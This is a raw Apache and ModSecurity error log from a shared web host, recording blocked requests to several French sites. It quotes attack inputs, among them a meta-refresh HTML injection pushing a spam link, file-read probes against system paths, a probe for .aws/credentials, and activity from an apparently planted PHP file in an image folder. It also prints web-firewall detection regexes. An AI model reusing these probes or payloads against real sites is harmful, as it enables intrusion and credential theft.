"OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.394606 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:20.394959 2026] [security2:error] [pid 1606352:tid 1606425] [client 194.233.64.127:55145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVHo_DFxNSZVmaX3yFwAAAMY"]
[Tue May 12 00:08:21.029287 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://jkjl.d8.9.adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.029683 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.031015 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSe [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.031382 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.032112 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://oke.zone/profile.php?id=454019>kampus telkom bandung</a><meta http-equiv=refresh content=0;url=https://oke.zone/profile.php?id=454019 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.032623 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:21.037298 2026] [security2:error] [pid 1601130:tid 1601165] [client 194.233.64.127:55194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTVXEgAO_835W6c1m5_wAAAE8"]
[Tue May 12 00:08:45.407517 2026] [ssl:error] [pid 1588898:tid 1588916] (EAI 2)Name or service not known: [client 74.7.241.129:54836] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:08:45.407577 2026] [ssl:error] [pid 1588898:tid 1588916] AH01941: stapling_renew_response: responder error
[Tue May 12 00:08:46.953566 2026] [security2:error] [pid 1605480:tid 1605532] [client 216.73.216.117:42456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: ebcffc1d7a26a729e90df39a941def6f||1778539126||1778538766"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agJTbh2Cvzd_nyNfUm8jEQAAAQo"]
[Tue May 12 00:08:46.953796 2026] [security2:error] [pid 1605480:tid 1605532] [client 216.73.216.117:42456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agJTbh2Cvzd_nyNfUm8jEQAAAQo"]
[Tue May 12 00:08:47.374532 2026] [security2:error] [pid 1605480:tid 1605532] [client 216.73.216.117:42456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJTbh2Cvzd_nyNfUm8jEQAAAQo"]
[Tue May 12 00:08:54.263502 2026] [security2:error] [pid 1605480:tid 1605537] [client 43.134.71.232:36752] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.totalcloud.fr"] [uri "/"] [unique_id "agJTdh2Cvzd_nyNfUm8jFAAAAQ8"]
[Tue May 12 00:08:54.271016 2026] [autoindex:error] [pid 1605480:tid 1605537] [client 43.134.71.232:36752] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:09:04.911960 2026] [security2:error] [pid 1630927:tid 1630952] [client 216.73.216.110:48440] ModSecurity: Warning. Matched phrase ".profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .profile found within ARGS:filesrc: /etc/lvm/profile/thin-generic.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJTgGiGYYhUwDaJINmwHAAAAVY"]
[Tue May 12 00:09:04.913130 2026] [security2:error] [pid 1630927:tid 1630952] [client 216.73.216.110:48440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJTgGiGYYhUwDaJINmwHAAAAVY"]
[Tue May 12 00:09:05.016400 2026] [security2:error] [pid 1630927:tid 1630952] [client 216.73.216.110:48440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJTgGiGYYhUwDaJINmwHAAAAVY"]
[Tue May 12 00:09:06.973817 2026] [:error] [pid 1601130:tid 1601154] [client 145.239.89.234:47804] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 00:09:08.281542 2026] [:error] [pid 1630927:tid 1630932] [client 141.94.76.134:50256] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 00:09:34.105146 2026] [security2:error] [pid 1606352:tid 1606440] [client 43.162.103.165:39506] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2023/02/Contre-claire-extrait-6.mp3"] [unique_id "agJTnno_DFxNSZVmaX3yZAAAANU"]
[Tue May 12 00:09:36.985605 2026] [security2:error] [pid 1588898:tid 1588912] [client 216.73.216.110:63589] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425550627/assets/Thumbs.db"] [unique_id "agJToKFW67LJTsgN3jQwPQAAAA0"]
[Tue May 12 00:09:36.985950 2026] [security2:error] [pid 1588898:tid 1588912] [client 216.73.216.110:63589] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425550627/assets/Thumbs.db"] [unique_id "agJToKFW67LJTsgN3jQwPQAAAA0"]
[Tue May 12 00:09:37.108481 2026] [security2:error] [pid 1588898:tid 1588912] [client 216.73.216.110:63589] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJToKFW67LJTsgN3jQwPQAAAA0"]
[Tue May 12 00:09:40.933807 2026] [security2:error] [pid 1630927:tid 1630931] [client 43.134.114.37:50238] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJTpGiGYYhUwDaJINmwPAAAAUE"]
[Tue May 12 00:10:02.010767 2026] [security2:error] [pid 1630927:tid 1630954] [client 43.130.16.140:60530] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJTumiGYYhUwDaJINmwYAAAAVg"]
[Tue May 12 00:10:03.890367 2026] [security2:error] [pid 1605480:tid 1605533] [client 43.159.143.187:49502] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJTux2Cvzd_nyNfUm8jRgAAAQs"]
[Tue May 12 00:10:10.741366 2026] [security2:error] [pid 1601130:tid 1601174] [client 43.153.96.233:49932] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJTwnEgAO_835W6c1m6UQAAAFg"]
[Tue May 12 00:10:17.186446 2026] [security2:error] [pid 1605480:tid 1605523] [client 43.157.188.74:47276] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/centaurea/"] [unique_id "agJTyR2Cvzd_nyNfUm8jTQAAAQE"]
[Tue May 12 00:11:31.990884 2026] [proxy_http:error] [pid 1588898:tid 1588909] (20014)Internal error (specific information not available): [client 208.84.100.11:9004] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 00:11:31.991244 2026] [proxy:error] [pid 1588898:tid 1588909] [client 208.84.100.11:9004] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.aws/credentials
[Tue May 12 00:11:55.026268 2026] [security2:error] [pid 1606352:tid 1606425] [client 43.164.0.21:44248] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agJUK3o_DFxNSZVmaX3zAAAAAMY"]
[Tue May 12 00:11:58.768234 2026] [security2:error] [pid 1605480:tid 1605523] [client 43.164.0.21:35628] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agJULh2Cvzd_nyNfUm8jvQAAAQE"], referer: http://tct-telecom.fr
PHP Warning:  filesize(): stat failed for /proc/8005/task/8005/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/task/8005/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/8005/task/8005/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/task/8005/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/8005/task/8005/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/8005/task/8005/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:12:35.660950 2026] [ssl:error] [pid 1588898:tid 1588904] (EAI 2)Name or service not known: [client 74.7.230.52:56690] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:12:35.661189 2026] [ssl:error] [pid 1588898:tid 1588904] AH01941: stapling_renew_response: responder error
[Tue May 12 00:13:11.573879 2026] [security2:error] [pid 1601130:tid 1601161] [client 43.166.142.76:49606] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agJUd3EgAO_835W6c1m7GQAAAEs"]
[Tue May 12 00:13:18.186382 2026] [security2:error] [pid 1605480:tid 1605530] [client 43.166.142.76:53564] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agJUfh2Cvzd_nyNfUm8kDwAAAQg"], referer: http://letamsgarage.fr
